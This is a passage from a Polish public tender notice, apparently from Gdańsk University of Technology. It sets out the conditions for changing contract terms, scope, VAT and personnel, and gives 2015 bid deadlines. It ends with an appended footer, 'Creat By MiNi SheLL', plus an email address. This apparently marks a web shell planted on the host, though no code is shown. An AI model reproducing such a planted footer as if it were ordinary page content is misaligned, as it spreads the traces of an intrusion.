- wstrzymania robót przez Zamawiającego
- konieczności oczekiwania na wprowadzenie przez projektanta korekt i uściśleń 
w rozwiązaniach projektowych,
- ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody 
w budynku,
- opóźnień spowodowanych niemożliwością prowadzenia robót w sposób ciągły                                 w pomieszczeniach , które nie mogą być wyłączone z eksploatacji, 
- ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód prawnych, formalnych lub technologicznych,
- realizacji robót dodatkowych, zamiennych lub zaniechania części robót. 
W okolicznościach wyżej wymienionych Strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
Wydłużenie okresu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia  terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości zabezpieczenia i jego wymaganej wysokości. 
b. 	zakresu i wartości umowy
Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub zaniechane. 
Wprowadzenie robót zamiennych jest możliwe jeśli:
- jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki w trakcie eksploatacji przedmiotu umowy, 
- stało się konieczne na skutek ujawnienia się błędów w dokumentacji projektowej, lub przeszkód         w budynku, 
- pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych                       w  dokumentacji projektowej,
- dotyczą zastosowania nowych technologii nieznanych zamawiającemu i niedostępnych                 w momencie zawarcia umowy.
Realizacja robót zamiennych w stosunku do określonych w umowie, musi być wywołana czynnikami obiektywnymi związanymi z tą realizacją tj. niezależnymi od wykonawcy, związanymi z koniecznością wprowadzenia zmian warunkujących realizację prac zgodnie ze sztuką budowlaną, nie powodującymi rozszerzenia przedmiotu zamówienia określonego w dokumentacji projektowej ani wynagrodzenia wykonawcy. 
Wprowadzenie robót zaniechanych jest możliwe jeśli:
- są one następstwem zleconych robót dodatkowych
- konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy
- zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży                     w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy. 
Wartość robót zaniechanych zostanie ustalona na podstawie cen z kosztorysu ofertowego Wykonawcy.
c.  		zmiany stawki VAT
Wynagrodzenie Wykonawcy może ulec zmianie w przypadku obniżenia lub podwyższenia stawki podatku VAT na skutek zmiany obowiązujących przepisów. 
Płatność będzie się odbywać z uwzględnieniem stawki VAT obowiązującej w dniu wystawienia faktury.
d.  zmiany w składzie osób uczestniczących w wykonywaniu zamówienia 
Wykonawca może dokonywać zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującą nową osobę.  
W przypadku zmiany osoba, która będzie uczestniczyć w wykonywaniu zamówienia, musi posiadać  kwalifikacje i doświadczenie, jakie posiadają osoby wskazane w ofercie. 
Wykonawca musi z własnej inicjatywy zaproponować zastępstwo w przypadku śmierci, choroby lub wypadku lub innej przyczyny wyłączającej możliwość pracy któregokolwiek z osób. 
Zamawiający może żądać zmiany, jeżeli w jego opinii osoba ta jest nieefektywna lub nie wywiązuje się z obowiązków wynikających z Umowy.

e.    zmiany lub rezygnacji z Podwykonawcy
Wykonawca może dokonać zmiany lub zrezygnować z Podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków
udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest zobowiązany wykazać
Zamawiającemu, iż proponowany inny Podwykonawca (lub Wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Obowiązek wykazania powyższych okoliczności w sposób nie budzący wątpliwości Zamawiającemu spoczywa na Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki, ul. Narutowicza 11/12, 80-233 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2015 godzina 09:45, miejsce: Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki, ul. Narutowicza 11/12, 80-233 Gdańsk, pok. 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com